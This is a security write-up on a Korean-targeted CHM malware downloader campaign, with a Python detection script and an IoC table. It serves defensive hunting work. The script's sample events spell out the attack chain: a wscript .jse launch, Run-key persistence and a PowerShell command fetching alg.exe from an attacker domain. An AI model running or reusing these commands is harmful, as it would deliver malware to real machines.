CHM Impersonates Korean Financial Institutes and Insurance Companies

2023-07-27 Ahnlab

https://asec.ahnlab.com/en/55569/


AhnLab ASEC reported CHM malware distributed inside RAR archives that impersonated Korean financial institutions and insurance companies, using lures such as credit-card limit notices, insurance-fee withdrawal results, and banking contracts. When opened, the CHM decompiled its contents to C:\Users\Public\Libraries and ran an encoded Docs.jse script through wscript. The script established persistence through the Run key and used PowerShell to download an additional payload to %tmp%\alg.exe from actor-controlled domains such as ppangz[.]mom and crilts[.]cfd. ASEC warned that the downloaded payload could carry out follow-on actions including information theft, so the campaign should be treated as a targeted Korean social-engineering downloader rather than a one-off lure.
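The chain in the summary above (staging under C:\Users\Public\Libraries, wscript running a .jse, a Run-key entry pointing back at that directory, PowerShell fetching %tmp%\alg.exe from one of the listed domains) maps directly onto a handful of hunting rules. The script below is an added example, not AhnLab's code or data: it applies those rules, plus the report's domain and hash IoCs, to constructed process-creation and registry events. The event field names (image, cmdline, reg_path, reg_value), the sample command lines and the rule names are assumptions for illustration, not a specific EDR or Sysmon schema.

```python
"""Triage rules for the CHM downloader chain described in the summary.

Added example, not AhnLab's code or data. The event records are
constructed for illustration; the field names (image, cmdline,
reg_path, reg_value) and the sample command lines are assumptions,
not a specific EDR or Sysmon schema.
"""
import re

# Domains and MD5 hashes taken from the report's IoC table.
IOC_DOMAINS = {"atusay.lat", "crilts.cfd", "ppangz.mom", "labimy.ink"}
IOC_MD5 = {
    "0f27c6e760c2a530ee59d955c566f6da",
    "59a924bb5cb286420edebf8d30ee424b",
    "bfe2a0504f7fb1326128763644c88d37",
    "aaeb059d62c448cbea4cf96f1bbf9efa",
}

# Staging directory the CHM decompiles into (compared case-insensitively).
STAGING_DIR = r"c:\users\public\libraries"
# %tmp%\alg.exe as it may appear literally, via $env:tmp, or already expanded.
TMP_ALG_RE = re.compile(r"(%tmp%|\$env:tmp|\\temp\\).{0,40}alg\.exe")
URL_HOST_RE = re.compile(r"https?://([a-z0-9.-]+)")


def ioc_hosts(text: str) -> set:
    """Return the report's IoC domains referenced by URLs in the text."""
    return {h for h in URL_HOST_RE.findall(text.lower()) if h in IOC_DOMAINS}


def classify(event: dict) -> list:
    """Return the names of every rule the event trips (empty if none)."""
    hits = []
    image = event.get("image", "").lower()
    cmd = event.get("cmdline", "").lower()
    # wscript executing a .jse that lives in the CHM staging directory.
    if image.endswith("wscript.exe") and ".jse" in cmd and STAGING_DIR in cmd:
        hits.append("wscript_jse_from_public_libraries")
    if image.endswith("powershell.exe"):
        if ioc_hosts(cmd):
            hits.append("powershell_contacts_ioc_domain")
        if TMP_ALG_RE.search(cmd):
            hits.append("powershell_drops_tmp_alg_exe")
    # Run-key persistence whose value points back at the staging directory.
    reg_path = event.get("reg_path", "").lower()
    reg_value = event.get("reg_value", "").lower()
    if "\\currentversion\\run\\" in reg_path and (
        STAGING_DIR in reg_value or ".jse" in reg_value
    ):
        hits.append("run_key_points_at_public_libraries")
    return hits


def triage(events: list) -> dict:
    """Map event index -> tripped rules, for events that trip at least one."""
    result = {}
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            result[i] = hits
    return result


def match_hashes(observed: list) -> set:
    """Intersect observed MD5s (any case) with the report's hash IoCs."""
    return {h.lower() for h in observed} & IOC_MD5


# Constructed sample events; these are not taken from the report.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" C:\Users\Public\Libraries\Docs.jse'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -c "iwr https://ppangz.mom/mjifi -OutFile $env:tmp\alg.exe"'},
    {"reg_path": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Docs",
     "reg_value": r"wscript.exe C:\Users\Public\Libraries\Docs.jse"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c Get-Process"},
    {"image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Scripts\logon.vbs"},
]

if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx], rules)
```

The rules deliberately key on the artefacts the summary names (staging path, .jse under it, Run key, %tmp%\alg.exe, the four domains) rather than on generic "wscript launched PowerShell" logic, so a hit is high-confidence but a changed staging path or filename will evade them; process lineage from the help-file viewer is not modelled because the summary does not describe it. The IoC domains are stored refanged in the code so they compare directly against command lines; treat the defanged forms in the table below as the canonical record.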

Indicators of Compromise

Type         Value                               First Seen   Last Seen
URL          hxxps://atusay[.]lat/kxydo          2023-07-20   2023-08-30
DOMAIN       atusay[.]lat                        2023-07-20   2023-08-30
URL          hxxps://crilts[.]cfd/cdeeb          2023-07-20   2023-08-25
DOMAIN       crilts[.]cfd                        2023-07-20   2023-08-25
HASH (MD5)   0f27c6e760c2a530ee59d955c566f6da    2023-07-20   2023-07-27
HASH (MD5)   59a924bb5cb286420edebf8d30ee424b    2023-07-20   2023-07-27
HASH (MD5)   bfe2a0504f7fb1326128763644c88d37    2023-07-20   2023-07-27
HASH (MD5)   aaeb059d62c448cbea4cf96f1bbf9efa    2023-07-20   2023-07-27
URL          hxxps://labimy[.]ink/rskme          2023-07-20   2023-07-27
URL          hxxps://ppangz[.]mom/mjifi          2023-07-20   2023-07-27
DOMAIN       ppangz[.]mom                        2023-07-20   2023-07-27
DOMAIN       labimy[.]ink                        2023-07-20   2023-07-27
